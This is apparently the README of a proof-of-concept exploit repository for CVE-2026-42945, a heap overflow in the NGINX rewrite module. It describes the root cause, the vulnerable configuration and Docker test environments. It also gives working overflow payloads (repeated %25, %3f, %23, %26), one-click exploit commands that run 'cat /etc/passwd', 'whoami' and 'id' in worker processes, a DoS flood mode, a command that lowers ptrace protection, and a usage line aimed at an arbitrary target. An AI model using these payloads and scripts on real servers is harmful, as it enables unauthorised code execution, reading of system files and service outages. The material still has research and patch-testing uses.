
Proof-of-concept exploit for CVE-2026-42945, a critical heap overflow in NGINX rewrite module enabling unauthenticated remote code execution via crafted URI encoding. Includes Docker-based testing environment, ASAN validation, and multiple exploit scripts.
RCE confirmed successful — via heap overflow + GDB process injection, execute arbitrary commands in NGINX / OpenResty worker processes.
# One-click build NGINX image + execute RCE test
./run.sh nginx
# One-click build OpenResty image + execute RCE test
./run.sh openresty
# Custom command
./run.sh nginx 'cat /etc/passwd'
./run.sh openresty 'whoami'
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-42945 |
| Vulnerability Type | Heap Buffer Overflow → Remote Code Execution (RCE) |
| Affected Component | ngx_http_rewrite_module |
| Affected Versions | NGINX 0.6.27 ~ 1.30.1, NGINX Plus R32 ~ R36 |
| CVSS Score | CVSS 9.4 (CRITICAL) |
| Exploitation Conditions | No authentication required; RCE requires ptrace privileges (root) |
ngx_http_script_complex_value_code() allocates a buffer based on the decoded length of the URI, but ngx_http_script_copy_capture_code() calls ngx_escape_uri() writing based on the encoded length. URL encoding characters expand 3× → heap overflow.
Three conditions must be met simultaneously:
rewrite and set directives in the same location blockrewrite replacement string contains ?set references the rewrite's capture variable $1location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /internal?migrated=true; # Contains '?'
set $original_endpoint $1; # References $1
}
#0 ngx_escape_uri src/core/ngx_string.c:1663
#1 ngx_http_script_copy_capture_code src/http/ngx_http_script.c:1399
#2 ngx_http_rewrite_handler src/http/modules/ngx_http_rewrite_module.c:180
.
├── run.sh # One-click build + test entry
├── README.md
│
├── scripts/ # Test & exploit scripts
│ ├── rce.sh # Pure Shell RCE (curl + GDB, no Python)
│ ├── exploit_rce.py # Python RCE (compatible with 2.7/3.x)
│ ├── exploit.py # PoC main script (check/exploit/rce/flood)
│ └── exploit_asan.py # ASAN comprehensive scan
│
├── package/ # Deployment & orchestration files
│ ├── Dockerfile.rce # NGINX source build + RCE environment
│ ├── Dockerfile.openresty.rce # OpenResty source build + RCE environment
│ ├── Dockerfile # Base image (Alpine)
│ ├── Dockerfile.asan # ASAN debug image
│ ├── docker-compose.yml # Docker orchestration (nginx-rce + openresty-rce)
│ ├── nginx.conf # NGINX vulnerable configuration
│ ├── nginx-openresty.conf # OpenResty vulnerable configuration
│ ├── start_rce.sh # NGINX RCE container startup script
│ └── start_openresty_rce.sh # OpenResty RCE container startup script
│
└── src/ # Source code (for compilation)
├── nginx-1.26.3/ # NGINX 1.26.3 source
├── nginx-1.26.3.tar.gz
└── openresty-1.25.3.1.tar.gz # OpenResty 1.25.3.1 (built-in nginx/1.25.3)
# Shell script (no Python dependency)
docker exec nginx-rce bash /opt/rce.sh 'id'
docker exec nginx-rce bash /opt/rce.sh 'cat /etc/passwd'
# Python script (compatible with 2.7/3.x)
docker exec nginx-rce python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'whoami'
# OpenResty equivalent
docker exec openresty-rce bash /opt/rce.sh 'id'
docker exec -it nginx-rce bash
# Inside container:
bash /opt/rce.sh 'id'
python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'uname -a'
# Requires root + ptrace privileges
sudo python3 scripts/exploit_rce.py -t http://target:80 -c 'id'
python3 scripts/exploit.py --target http://localhost:8775 --mode check # Detect vulnerability
python3 scripts/exploit.py --target http://localhost:8775 --mode exploit # ASAN heap overflow verification
python3 scripts/exploit.py --target http://localhost:8775 --mode rce # RCE risk assessment
python3 scripts/exploit.py --target http://localhost:8775 --mode flood # DoS stress test
| Payload | Description | Result |
|---|---|---|
/api/%25 × N | Encoded % | ✅ Heap Overflow |
/api/%3f × N | Encoded ? | ✅ Heap Overflow |
/api/%23 × N | Encoded # | ✅ Heap Overflow |
/api/%26 × N | Encoded & | ✅ Heap Overflow |
rewrite (containing ?) + set (referencing $1) combination%25/%3f/%23/%26 encoded requestsecho 1 > /proc/sys/kernel/yama/ptrace_scope